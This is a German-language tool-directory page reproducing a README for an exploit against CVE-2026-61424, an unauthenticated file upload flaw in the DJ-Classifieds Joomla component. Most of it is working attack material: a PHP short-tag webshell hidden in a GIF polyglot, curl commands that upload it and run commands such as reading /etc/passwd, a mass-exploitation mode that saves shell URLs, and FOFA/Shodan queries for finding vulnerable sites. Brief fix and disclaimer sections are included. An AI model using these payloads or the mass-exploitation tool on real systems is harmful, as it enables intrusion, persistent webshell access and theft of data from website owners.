Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-61424 — DJ-Classifieds Joomla-Komponente: Nicht authentifizierter Datei-Upload mit Remote-Codeausführung (RCE). 3-String-Filter-Bypass mittels PHP-Short-Tags. CVSS 10.0 | CWE-434 | com_djclassifieds < 3.11.2 | Kitploit
Tools/GitHubGitHub/shinthink/cve-2026-61424
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsFehlkonfigurationRed TeamingRemote-Access-Tool
GitHubshinthink/cve-2026-61424

CVE-2026-61424

DJ-Classifieds Joomla-Komponente: Nicht authentifizierter Datei-Upload mit Remote-Codeausführung (RCE). 3-String-Filter-Bypass mittels PHP-Short-Tags. CVSS 10.0 | CWE-434 | com_djclassifieds < 3.11.2

113vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
Teilen

Python CVE CVSS License

CVE-2026-61424 — DJ-Classifieds <= 3.11.1

imageupload-Task → Keine Authentifizierung → 3-String-Filter-Bypass (

Überblick

Nicht authentifizierter beliebiger Datei-Upload in DJ-Classifieds für Joomla. Der imageupload-Task-Endpunkt verarbeitet Datei-Uploads ohne Authentifizierung und verlässt sich auf eine 3-String-Blocklist (<?php, eval(, base64), die mithilfe von PHP-Short-Open-Tags (<?=) trivial umgangen werden kann. In Kombination mit einem GIF-Polyglot besteht die hochgeladene Datei alle Bildvalidierungsprüfungen und enthält dennoch eine voll funktionsfähige PHP-Webshell.

FeldDetail
CVECVE-2026-61424
ProduktDJ-Classifieds (Joomla-Erweiterung von DJ-Extensions)
CVSS 4.010.0 (Kritisch)
TypCWE-434 — Unbeschränkter Datei-Upload
EntdecktPhil Taylor / mySites.guru — 16. Juli 2026
AusnutzungVor der Offenlegung in freier Wildbahn bestätigt

Betroffene Versionen

StatusVersion
Verwundbar1.0 — 3.11.1
Behoben3.11.2 (20. Juli 2026)

Schwachstellen-Mechanismus

Grundursache

Die upload()-Methode in administrator/components/com_djclassifieds/lib/djupload.php ist dem imageupload-Task zugeordnet, ohne Authentifizierungsprüfung und ohne CSRF-Token-Validierung.

// administrator/components/com_djclassifieds/lib/djupload.php
// imageupload task → upload() method

// MISSING: JFactory::getUser() auth check
// MISSING: JSession::checkToken() CSRF check

$name     = $_REQUEST['name'] ?? $_REQUEST['filename'] ?? '';
$raw_body = file_get_contents('php://input');

// ... writes file to tmp/djupload/<name>

Warum der Sicherheitsfilter versagt (3-String-Bypass)

Der Inhalts-Scanner blocklistet nur drei Literal-Strings:

// The ONLY malicious-content check in the entire upload handler:
if (preg_match('/<\?php|eval\(|base64/i', $fileContent)) {
    die('Malicious file detected');
}

Dies blockiert <?php, eval( und base64 — aber nicht PHP-Short-Open-Tags:

<?=system($_GET['c']);?>     ← 0/3 blockierte Strings → WIRD AKZEPTIERT

PHP-Short-Echo-Tags (<?=) sind seit PHP 5.4 standardmäßig aktiviert.

Angriffsablauf

  1. Erstelle ein Polyglot: gültiger GIF89a-Header + <?=system($_GET['c']);?>
  2. POST an index.php?option=com_djclassifieds&task=imageupload mit name=shell.gif
  3. Server prüft: .gif-Endung ✓ getimagesize() ✓ kein <?php/eval(/base64 ✓
  4. Datei gespeichert unter tmp/djupload/<shell>.gif
  5. Zugriff: https://target.com/tmp/djupload/shell.gif?c=id

Verifizierte Quelldateien

DateiRolle
administrator/components/com_djclassifieds/lib/djupload.phpupload()-Methode — keine Authentifizierung, 3-String-Filter
components/com_djclassifieds/controller.phpLeitet den imageupload-Task an upload() weiter
administrator/components/com_djclassifieds/djclassifieds.xmlVersionspreisgabe über das <version>-Tag

Server-Log-Beweise

Vor der Offenlegung wurden anonyme Scanner-Sonden in freier Wildbahn beobachtet:

POST /index.php?option=com_djclassifieds&task=imageupload
  name=<random>.gif  filename=<random>.gif
  — no cookie, no session, no referer

Installation

git clone https://github.com/shinthink/CVE-2026-61424.git
cd CVE-2026-61424
pip install -r requirements.txt

Verwendung

Einzelnes Ziel

python cve_2026_61424.py -t target.com

Massenausnutzung

python cve_2026_61424.py -f targets.txt -o shells.txt

Argumente

FlagBeschreibungStandard
-t, --targetEinzelner Zielhost—
-f, --fileDatei mit Zielen (eines pro Zeile, #-Kommentare)—
-o, --outputRCE-URLs in Datei speichern—
--threadsWorker-Threads für den Massenmodus30
--no-cleanupShell nach RCE nicht löschenFalse
--debugDebug-AusgabeFalse

Proof of Concept

Einzelnes Ziel

$ python cve_2026_61424.py -t target.com

  Host         : target.com
  DJ-Classifieds: YES v3.11.1
  Upload       : YES
  RCE          : YES
  Shell        : https://target.com/tmp/djupload/img_abc123.gif
  Output       : DJ-SHELL-OK Linux ... uid=33(www-data) gid=33(www-data) ...
  Time         : 2.1s

Manuelle Ausnutzung

# Step 1 — Upload polyglot shell
curl -sk -X POST \
  "https://target.com/index.php?option=com_djclassifieds&task=imageupload&name=shell.gif&filename=shell.gif" \
  -H "Content-Type: image/gif" \
  --data-binary @polyglot.gif

# Step 2 — Verify RCE
curl -sk "https://target.com/tmp/djupload/shell.gif?c=id;hostname;uname+-a"

# Step 3 — Execute arbitrary commands
curl -sk "https://target.com/tmp/djupload/shell.gif?c=cat%20/etc/passwd"

FOFA / Shodan

# DJ-Classifieds component
body="com_djclassifieds"

# Version disclosure (XML manifest)
body="DJ-Classifieds" && body="<version>"

# Exposed djupload directory
body="Index of" && body="djupload"

# Shodan
http.html:"com_djclassifieds" http.component:"Joomla"

Der Fix (3.11.2)

  1. Joomla-Authentifizierung hinzugefügt — Gastprüfung mit JFactory::getUser() vor upload()
  2. CSRF-Token-Validierung hinzugefügt — JSession::checkToken() beim imageupload-Task
  3. Dateitypen eingeschränkt — serverseitige Nur-Bilder-Allowlist (jpg, jpeg, png, gif)
  4. Verbesserte Inhaltsprüfung — zusätzliche PHP-Mustererkennung über die 3-String-Blocklist hinaus

Auswirkungen

  • Vollständiger RCE — Ausführen beliebiger Befehle als Web-Server-Benutzer
  • Dauerhafter Zugriff — Shell bleibt bestehen, bis sie manuell entfernt oder das Verzeichnis bereinigt wird
  • Inhaltsmissbrauch — Hochladen und Hosten beliebiger Dateien auf vertrauenswürdiger Domain
  • Speichererschöpfung — anonyme Massen-Upload-Fähigkeit
  • Verkettete Angriffe — das Polyglot-Bild kann an anderer Stelle der Website per LFI eingebunden werden

Haftungsausschluss

Dieses Tool dient ausschließlich Bildungs- und autorisierten Sicherheitstests. Verwenden Sie es nur gegen Systeme, die Ihnen gehören oder für die Sie eine ausdrückliche Testberechtigung haben. Der Autor übernimmt keine Haftung für Missbrauch oder Schäden.


Referenzen

RessourceLink
IONIX Threat Centerionix.io/threat-center/cve-2026-61424
mySites.guru-Entdeckungmysites.guru/blog/dj-classifieds-unauthenticated-file-upload
DJ-Extensions-Sicherheitsreleasedj-extensions.com/blog/general/dj-classifieds-3-11-2-security-release
CVE.org-Eintragcve.org/CVERecord?id=CVE-2026-61424
INCIBE-CERTincibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2026-61424

Nicht mit DJ-Extensions oder mySites.guru verbunden.

Tool herunterladen